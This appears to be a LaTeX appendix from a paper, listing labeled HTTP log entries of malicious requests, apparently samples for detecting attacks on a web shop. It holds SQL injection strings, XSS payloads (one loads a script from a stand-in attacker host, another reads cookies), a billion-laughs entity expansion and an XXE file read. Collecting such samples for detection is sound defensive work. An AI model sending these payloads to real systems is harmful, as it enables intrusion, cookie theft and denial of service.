\newpage
\section{Appendix}
\begin{lstlisting}[language=java]
SQL1: |{"timestamp":1502738763912 method:"get" query:{"query":"OR 1=1; #"} path:"/search" statusCode:404 source:{"remoteAddress":"233.150.201.166" referer:"http://localhost:8002/enter"} route:"/search" headers:{"host":"localhost:8002" connection:"keep-alive" accept:"*/*" cache-control:"no-cache" x-requested-with:"XMLHttpRequest" referer:"http://localhost:8002/enter" accept-encoding:"gzip deflate br" accept-language:"en-US en;q=0.8 es;q=0.6"} requestPayload:null responsePayload:{"statusCode":404 error:"Not Found" message:"Not Found"}} | 1

SQL2: |{"timestamp":1502738763910 method:"get" query:{"query":"Pajamas & RobesOR 1=1; #"} path:"/search" statusCode:404 source:{"remoteAddress":"233.150.201.166"} route:"/search" headers:{"host":"localhost:8002" connection:"keep-alive" cache-control:"no-cache" accept:"*/*" accept-encoding:"gzip deflate br" accept-language:"en-US en;q=0.8 es;q=0.6"} requestPayload:null responsePayload:{"statusCode":404 error:"Not Found" message:"Not Found"}}| 1

SQL3: |{"timestamp":1502738747976 method:"get" query:{"query":"Connected Solutions;DROP TABLE categories"} path:"/search" statusCode:404 source:{"remoteAddress":"17.110.122.146" referer:"http://localhost:8002/enter"} route:"/search" headers:{"host":"localhost:8002" connection:"keep-alive" accept:"*/*" cache-control:"no-cache" x-requested-with:"XMLHttpRequest" referer:"http://localhost:8002/enter" accept-encoding:"gzip deflate br" accept-language:"en-US en;q=0.8 es;q=0.6"} requestPayload:null responsePayload:{"statusCode":404 error:"Not Found" message:"Not Found"}}| 1


XSS0: |{"timestamp":1502738738213 method:"post" query:{} path:"/checkout" statusCode:400 source:{"remoteAddress":"138.116.238.224"} route:"/checkout" headers:{"host":"localhost:8002" connection:"keep-alive" cache-control:"no-cache" accept:"*/*" accept-encoding:"gzip deflate br" accept-language:"en-US en;q=0.8 es;q=0.6" content-type:"application/json" content-length:"41"} requestPayload:{"creditCard":"<script>alert()</script>"} responsePayload:{"statusCode":400 error:"Bad Request" message:"Bad Request"}}| 1

XSS1: |{"timestamp":1502738733339 method:"post" query:{} path:"/checkout" statusCode:400 source:{"remoteAddress":"2.82.106.53"} route:"/checkout" headers:{"host":"localhost:8002" connection:"keep-alive" cache-control:"no-cache" accept:"*/*" accept-encoding:"gzip deflate br" accept-language:"en-US en;q=0.8 es;q=0.6" content-type:"application/json" content-length:"94"} requestPayload:{"creditCard":"<script> document.write(\"<iframe src=\"http://anywhere.com\"/>\"); </script>"} responsePayload:{"statusCode":400 error:"Bad Request" message:"Bad Request"}}| 1

XSS2: |{"timestamp":1502738736927 method:"post" query:{} path:"/checkout" statusCode:400 source:{"remoteAddress":"150.179.95.122" referer:"http://localhost:8002/enter"} route:"/checkout" headers:{"host":"localhost:8002" accept-language:"en-us" accept-encoding:"gzip deflate" connection:"keep-alive" accept:"*/*" referer:"http://localhost:8002/enter" cache-control:"no-cache" x-requested-with:"XMLHttpRequest" content-type:"application/json" content-length:"80"} requestPayload:{"creditCard":"<script src=\"http://attacker/maliciouscript.js\"></script>"} responsePayload:{"statusCode":400 error:"Bad Request" message:"Bad Request"}}| 1

XSS3: |{"timestamp":1502738777968	method:"post"	query:{}	path:"/checkout"	statusCode:400	source:{"remoteAddress":"2.197.184.201"}	route:"/checkout"	headers:{"host":"localhost:8002"	connection:"keep-alive"	cache-control:"no-cache"	accept:"*/*"	accept-encoding:"gzip	 deflate	 br"	accept-language:"en-US	en;q=0.8	es;q=0.6"	content-type:"application/json"	content-length:"97"}	requestPayload:{"creditCard":"<img src=\"http://url.to.file.which/not.exist\" onerror=alert(document.cookie);>"}	responsePayload:{"statusCode":400	error:"Bad Request"	message:"Bad Request"}}|	1				

XSS4: |{"timestamp":1502738730542 method:"post" query:{} path:"/checkout" statusCode:400 source:{"remoteAddress":"33.202.3.178"} route:"/checkout" headers:{"host":"localhost:8002" connection:"keep-alive" cache-control:"no-cache" accept:"*/*" accept-encoding:"gzip deflate br" accept-language:"en-US en;q=0.8 es;q=0.6" content-type:"application/json" content-length:"128"} requestPayload:{"creditCard":"<META HTTP-EQUIV=\"refresh\"CONTENT=\"0;url=data:text/html;base64 PHNjcmlwdD5hbGVydCgndGVzdDMnKTwvc2NyaXB0Pg\">"} responsePayload:{"statusCode":400 error:"Bad Request" message:"Bad Request"}}| 1

XXE1: |{"timestamp":1502738738279 method:"post" query:{} path:"/checkout" statusCode:400 source:{"remoteAddress":"45.166.241.46"} route:"/checkout" headers:{"host":"localhost:8002" connection:"keep-alive" cache-control:"no-cache" accept:"*/*" accept-encoding:"gzip deflate br" accept-language:"en-US en;q=0.8 es;q=0.6" content-type:"application/json" content-length:"720"} requestPayload:{"creditCard":"<?xml version=\"1.0\"?><!DOCTYPE lolz [<!ENTITY lol \"lol\"><!ENTITY lol2 \"&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;\"><!ENTITY lol3 \"&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;\"><!ENTITY lol4 \"&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;\"><!ENTITY lol5 \"&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;\"><!ENTITY lol6 \"&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;\"><!ENTITY lol7 \"&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;\"><!ENTITY lol8 \"&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;\"><!ENTITY lol9 \"&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;\">]><lolz>&lol9;</lolz>"} responsePayload:{"statusCode":400 error:"Bad Request" message:"Bad Request"}}| 1

XXE2: |{"timestamp":1502738732603 method:"post" query:{} path:"/checkout" statusCode:400 source:{"remoteAddress":"63.212.88.27"} route:"/checkout" headers:{"host":"localhost:8002" connection:"keep-alive" cache-control:"no-cache" accept:"*/*" accept-encoding:"gzip deflate br" accept-language:"en-US en;q=0.8 es;q=0.6" content-type:"application/json" content-length:"126"} requestPayload:{"creditCard":"<!DOCTYPE foo [<!ELEMENT root ANY ><!ENTITY unixfile SYSTEM \"file:///dev/random\" >]><root>&unixfile;</root>"} responsePayload:{"statusCode":400 error:"Bad Request" message:"Bad Request"}}| 1
\end{lstlisting}